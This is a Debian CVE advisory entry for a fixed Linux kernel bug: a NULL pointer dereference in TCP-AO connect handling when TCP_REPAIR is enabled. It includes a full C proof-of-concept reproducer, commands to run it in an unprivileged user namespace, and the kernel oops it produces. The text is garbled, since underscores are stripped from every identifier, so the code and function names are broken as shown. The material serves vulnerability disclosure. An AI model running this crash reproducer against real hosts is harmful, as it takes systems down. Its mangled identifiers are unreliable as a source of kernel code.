DEBIAN-CVE-2025-39950

In the Linux kernel, the following vulnerability has been resolved: net/tcp: Fix a NULL pointer dereference when using TCP-AO with TCPREPAIR A NULL pointer dereference can occur in tcpaofinishconnect() during a connect() system call on a socket with a TCP-AO key added and TCPREPAIR enabled. The function is called with skb being NULL and attempts to dereference it on tcphdr(skb)->seq without a prior skb validation. Fix this by checking if skb is NULL before dereferencing it. The commentary is taken from bpfskopsestablished(), which is also called in the same flow. Unlike the function being patched, bpfskopsestablished() validates the skb before dereferencing it. int main(void){ struct sockaddrin sockaddr; struct tcpaoadd tcpao; int sk; int one = 1; memset(&sockaddr,'\0',sizeof(sockaddr)); memset(&tcpao,'\0',sizeof(tcpao)); sk = socket(AFINET, SOCKSTREAM, IPPROTOTCP); sockaddr.sinfamily = AFINET; memcpy(tcpao.algname,"cmac(aes128)",12); memcpy(tcpao.key,"ABCDEFGHABCDEFGH",16); tcpao.keylen = 16; memcpy(&tcpao.addr,&sockaddr,sizeof(sockaddr)); setsockopt(sk, IPPROTOTCP, TCPAOADDKEY, &tcpao, sizeof(tcpao)); setsockopt(sk, IPPROTOTCP, TCPREPAIR, &one, sizeof(one)); sockaddr.sinfamily = AFINET; sockaddr.sinport = htobe16(123); inetaton("127.0.0.1", &sockaddr.sinaddr); connect(sk,(struct sockaddr *)&sockaddr,sizeof(sockaddr)); return 0; } $ gcc tcp-ao-nullptr.c -o tcp-ao-nullptr -Wall $ unshare -Urn BUG: kernel NULL pointer dereference, address: 00000000000000b6 PGD 1f648d067 P4D 1f648d067 PUD 1982e8067 PMD 0 Oops: Oops: 0000 [#1] SMP NOPTI Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop Reference Platform, BIOS 6.00 11/12/2020 RIP: 0010:tcpaofinishconnect (net/ipv4/tcp_ao.c:1182)